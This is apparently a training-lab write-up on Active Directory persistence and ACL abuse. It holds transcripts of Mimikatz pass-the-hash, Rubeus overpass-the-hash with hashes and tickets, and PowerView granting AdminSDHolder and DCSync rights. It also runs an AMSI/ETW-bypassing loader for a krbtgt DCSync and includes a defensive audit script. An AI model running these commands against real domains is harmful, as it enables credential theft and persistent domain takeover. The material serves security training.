C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\Invoke-MimiEx.ps1
PS C:\Windows\system32> Invoke-Mimi -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator
/ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::pth /domain:dcorp-dc /user:Administrator


/ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe
user : Administrator
domain : dcorp-dc
program : powershell.exe
impers. : no
NTLM : a102ad5753f4c441e3af31c97fad86fd
| PID 3252
| TID 3216
| LSA Process is now R/W
| LUID 0 ; 845302 (00000000:000ce5f6)
\_ msv1_0 - data copy @ 000001B68D883570 : OK !
\_ kerberos - data copy @ 000001B68DD675A8
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 000001B68E2FBAA8 (32) -> null

A new PowerShell session opens.


PS C:\Windows\System32>ls \\dcorp-dc.dollarcorp.moneycorp.local\c$
Directory: \\dcorp-dc.dollarcorp.moneycorp.local\c$
Mode LastWriteTime Length Name
---- ------------- ------ ----
05/08/2021 12:20 AM <DIR> PerfLogs
11/14/2022 10:12 PM <DIR> Program Files
05/08/2021 01:40 AM <DIR> Program Files (x86)
03/03/2023 08:19 AM <DIR> Users
11/11/2022 09:58 PM <DIR> Windows

Persistence
This persistence is long-lived, since the DSRM password is reset very rarely.

Persistence using ACL


AdminSDHolder
AdminSDHolder is a security feature in Active Directory (AD) designed to protect the security descriptors
of high-privilege accounts and groups, ensuring their permissions cannot be easily altered by unauthorized
users. This mechanism plays a crucial role in maintaining the security and integrity of AD environments.

What is AdminSDHolder?

• Location: The AdminSDHolder object is located in the System container of the AD domain.

o Distinguished Name (DN): CN=AdminSDHolder,CN=System,DC=<domain>,DC=<com>

• Purpose: It acts as a template for security descriptors that are applied to protected groups and
their members.

• SDProp (Security Descriptor Propagator): A background process that runs every 60 minutes and
ensures that the security descriptors of protected accounts and groups match those of the
AdminSDHolder object.

List of the protected groups

• Account Operators

• Backup Operators

• Server Operators

• Print Operators

• Domain Admins

• Replicator

• Enterprise Admins

• Domain Controllers

• Read-Only Domain Controllers

• Schema Admins

• Administrators

When a user or group is added to one of these protected groups, the SDProp process applies the security
descriptors from AdminSDHolder to ensure consistency and protection.
How AdminSDHolder Works

1. Initial Setup: The AdminSDHolder object is created during the installation of AD. It contains a
default security descriptor template.

2. Membership Tracking: AD tracks membership of the protected groups.

3. SDProp Process:

o Runs every 60 minutes.

o Checks the security descriptors of the protected accounts and groups.

o Compares them to the template in the AdminSDHolder object.

o Updates the security descriptors of the protected accounts and groups to match the
AdminSDHolder template.

Using AdminSDHolder
Because the Security Descriptor Propagator runs every hour to undo accidental and unintended
modifications, adding GenericAll rights directly on any of the protected accounts or groups cannot be used
for persistence: the change is overwritten on the next run. The technique is instead to add GenericAll
rights on the AdminSDHolder object in the System container, so that SDProp itself propagates them to every
protected object. For this we need Domain Administrator privileges.
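The same propagation that makes this technique work also makes it easy to audit: an unexpected trustee on the AdminSDHolder DACL is the root cause, and the same trustee then appears on every protected group. The following script is an added example and is not part of the lab notes, PowerView or the RACE toolkit. It uses the ActiveDirectory module's AD: drive to list explicit ACEs on AdminSDHolder that grant write-class rights to principals outside a small allow-list, and then checks whether a flagged trustee has already been stamped onto Domain Admins (the check the notes perform below with PowerView, seen from the defender's side). The allow-list and the rights pattern are assumptions to be baselined per forest.

```powershell
# Added example (not from the lab notes): audit the AdminSDHolder DACL and confirm propagation.
Import-Module ActiveDirectory

function Get-AdminSDHolderRiskyAce {
    [CmdletBinding()]
    param(
        # Assumption: trustees that legitimately hold write-class rights on AdminSDHolder.
        # Baseline this list in your own forest before trusting the output.
        [string[]]$AllowedTrustee = @('NT AUTHORITY\SYSTEM', 'NT AUTHORITY\SELF',
                                      'BUILTIN\Administrators', 'Domain Admins', 'Enterprise Admins'),
        # Rights that let a trustee change membership, the DACL or the owner of a protected object.
        [string]$RiskyRights = 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty'
    )
    $domain = Get-ADDomain
    $dn     = "CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)"
    $acl    = Get-Acl -Path "AD:\$dn"

    foreach ($rule in $acl.Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if ($rule.ActiveDirectoryRights.ToString() -notmatch $RiskyRights) { continue }

        $trustee = $rule.IdentityReference.Value
        $isAllowed = $false
        foreach ($a in $AllowedTrustee) { if ($trustee -like "*$a") { $isAllowed = $true } }
        if ($isAllowed) { continue }

        [pscustomobject]@{
            Object     = $dn
            Trustee    = $trustee
            Rights     = $rule.ActiveDirectoryRights
            ObjectType = $rule.ObjectType   # all-zero GUID: the right applies to every attribute
            Inherited  = $rule.IsInherited  # explicit (non-inherited) ACEs are the ones SDProp copies
        }
    }
}

function Test-ProtectedGroupAce {
    # Show what a trustee flagged on AdminSDHolder already holds on a protected group.
    param(
        [Parameter(Mandatory)][string]$Trustee,
        [string]$Group = 'Domain Admins'
    )
    $g = Get-ADGroup -Identity $Group
    (Get-Acl -Path "AD:\$($g.DistinguishedName)").Access |
        Where-Object { $_.IdentityReference.Value -eq $Trustee } |
        Select-Object @{ n = 'Group'; e = { $Group } }, IdentityReference, ActiveDirectoryRights, IsInherited
}

# Usage: list risky explicit ACEs on AdminSDHolder, then confirm propagation onto Domain Admins.
$findings = Get-AdminSDHolderRiskyAce
$findings | Format-Table Trustee, Rights, Inherited -AutoSize
foreach ($f in $findings) { Test-ProtectedGroupAce -Trustee $f.Trustee }
```

The Get-Acl call goes through the AD: drive that the ActiveDirectory module creates for the domain the session is joined to; the function works on any distinguished name, so the same audit can be pointed at the domain root object to review who holds write rights there. Removing the offending ACE from AdminSDHolder is not enough on its own: the copies already stamped on the protected groups persist until SDProp runs again, so the same trustee must be removed from those objects as well.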

We will open a command prompt session with Domain Administrator privileges using an OverPass the
Hash attack.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True


[*] Username : C7VIN1FF
[*] Domain : 51ZKXSPD
[*] Password : YM58PIQG
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 1560
[+] LUID : 0x1000ac

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)


[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 1048748
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0x1000ac
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/1/2024 10:32:25 AM
EndTime : 7/1/2024 8:32:25 PM
RenewTill : 7/8/2024 10:32:25 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 5bWbbmtKXxSBFTQZKcO8qE9j7iDdK/U7yKab8IpDCiY=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new command prompt opens. In that new session, we add GenericAll rights on the AdminSDHolder object in
the System container to our student user (student163).
C:\Windows\system32>C:\AD\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\PowerView.ps1
PS C:\Windows\system32> Add-ObjectAcl -TargetIdentity
'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student163 -
Verbose -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain
dollarcorp.moneycorp.local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(|(samAccountName=student163)(name=student163)(displayname=student163)))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(|(samAccountName=student163)(name=student163)(displayname=student163))))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local 'All' on
CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '00000000-0000-0000-0000-000000000000' on
CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local

Since the SDProp process runs every 60 minutes, we will execute the Invoke-SDPropagator.ps1 script
manually to apply the changes immediately without waiting for the scheduled interval.
PS C:\Windows\system32> $session_dc = New-PSSession -ComputerName dcorp-
dc.dollarcorp.moneycorp.local
PS C:\Windows\system32> Invoke-Command -Session $session_dc -FilePath C:\Ad\Tools\Invoke-
SDPropagator.ps1
PS C:\Windows\system32> Invoke-Command -Session $session_dc -ScriptBlock {Invoke-SDPropagator -
timeoutMinutes 1 -showProgress -Verbose}
VERBOSE: PDC Located at dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Initiating SD Propogation on dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Checking for start of SD Propagator

Now we can check the permissions of our student user (student163) on the Domain Admins group.
PS C:\Windows\system32> Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | foreach {$_
| Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?
{$_.IdentityName -match 'student163' }

AceType : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13603
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
IdentityName : dcorp\student163

Now we have GenericAll rights on the Domain Admins group and can add users to it whenever required.

This can also be accomplished using the Active Directory module and RACE toolkit.

Persistence
The persistence using AdminSDHolder can last indefinitely, as long as the Security Descriptor Propagator
(SDProp) process is active and no changes are made to the AdminSDHolder object or the attacker's
permissions.

Rights Abuse
There are even more interesting ACLs which can be abused. If we have Domain Administrator privileges,
the ACL of the domain root object can be modified to grant useful rights such as Full Control or the ability
to run DCSync.

For this we will open a command prompt with administrative privileges.


C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True


[*] Username : TTW95PEJ
[*] Domain : 89B3Z8Y2
[*] Password : K4IDDNM1
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 3896
[+] LUID : 0x17ae61
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 1551969
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0x17ae61
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/2/2024 6:00:16 AM
EndTime : 7/2/2024 4:00:16 PM
RenewTill : 7/9/2024 6:00:16 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : uJI37jPwPkH7jkGeoKP+9VnSwT1AgO//dIRYIMGHFYA=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new command prompt opens with administrative privileges. We give DCSync permissions to student163
using the PowerView function Add-ObjectAcl.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\PowerView.ps1
PS C:\Windows\system32> Add-ObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -
PrincipalIdentity student163 -Verbose -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local
-TargetDomain dollarcorp.moneycorp.local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(|(samAccountName=student163)(name=student163)(displayname=student163)))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(|(samAccountName=student163)(name=student163)(displayname=student163))))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local 'DCSync'
on DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' on DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' on DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '89e95b76-444d-4c62-991a-0facbeda640c' on DC=dollarcorp,DC=moneycorp,DC=local

We open a new shell to check the permissions we have on the Domain Object.
PS C:\Windows\system32> . C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll
C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\PowerView.ps1
PS C:\Windows\system32> Get-ObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -
SearchScope Base -ResolveGUIDs | ? { ($_.ObjectAceType -match 'replication-get') -or
($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')
} | foreach {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName
$_.SecurityIdentifier);$_} | ? {$_.IdentityName -match 'student163' }

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-In-Filtered-Set
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13603
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : dcorp\student163

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13603
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : dcorp\student163

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13603
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : dcorp\student163

We will execute a DCSync attack.


C:\Windows\system32>C:\AD\Tools\Loader.exe -Path "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe"
"lsadump::dcsync /user:dcorp\krbtgt" "exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe Arguments :
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
